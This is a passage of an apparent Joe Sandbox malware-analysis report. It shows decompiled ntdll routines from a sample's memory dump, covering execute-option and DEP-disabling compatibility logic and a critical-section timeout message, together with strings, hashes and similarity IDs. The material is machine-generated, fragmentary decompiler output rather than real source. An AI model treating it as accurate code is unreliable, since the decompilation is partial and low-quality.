                                                        					__eflags = _t56;
                                                        					if(_t56 != 0) {
                                                        						goto L15;
                                                        					}
                                                        					_t103 = _v552;
                                                        					goto L10;
                                                        				} else {
                                                        					L4:
                                                        					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
                                                        					goto L5;
                                                        				}
                                                        			}


                                                        Strings
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018405AC
                                                        • Execute=1, xrefs: 0184057D
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 0184058F
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01840566
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018404BF
                                                        • ExecuteOptions, xrefs: 0184050A
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 018405F1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: 544966f6cbde8a6800635f28ccb6b5c4f50d5143fab90ef589f9eac4c65c9660
                                                        • Instruction ID: 2d8a977b5951b2c187b89cbe0dafe380c2bbb026b0b839015cabf3a0310831ca
                                                        • Opcode Fuzzy Hash: 544966f6cbde8a6800635f28ccb6b5c4f50d5143fab90ef589f9eac4c65c9660
                                                        • Instruction Fuzzy Hash: A06117717002197BEF21EA98DC89FAAB7F9EF68745F04009DE606E7181DA70DB418F61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 53%
                                                        			E0187FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                        				void* _t7;
                                                        				intOrPtr _t9;
                                                        				intOrPtr _t10;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t13;
                                                        				intOrPtr _t14;
                                                        				intOrPtr* _t15;
                                                        
                                                        				_t13 = __edx;
                                                        				_push(_a4);
                                                        				_t14 =  *[fs:0x18];
                                                        				_t15 = _t12;
                                                        				_t7 = E0182CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                        				_push(_t13);
                                                        				E01875720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                        				_t9 =  *_t15;
                                                        				if(_t9 == 0xffffffff) {
                                                        					_t10 = 0;
                                                        				} else {
                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                        				}
                                                        				_push(_t10);
                                                        				_push(_t15);
                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                        				return E01875720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                        			}










                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0187FDFA
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0187FE2B
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0187FE01
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                        • API String ID: 885266447-3903918235
                                                        • Opcode ID: bf718a8d1b3cddae8705d81b8628ba62e9d024240d1b1ec9b508b3093880ff39
                                                        • Instruction ID: f4e4d684d3f02a3005d0961ed025cb2f4cfd2745ca881b97eadb802e52f3ef5f
                                                        • Opcode Fuzzy Hash: bf718a8d1b3cddae8705d81b8628ba62e9d024240d1b1ec9b508b3093880ff39
                                                        • Instruction Fuzzy Hash: E1F0FC721005017FD7201A5ADC01F33BF6ADB44770F140314F728951D1DA62F96097F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%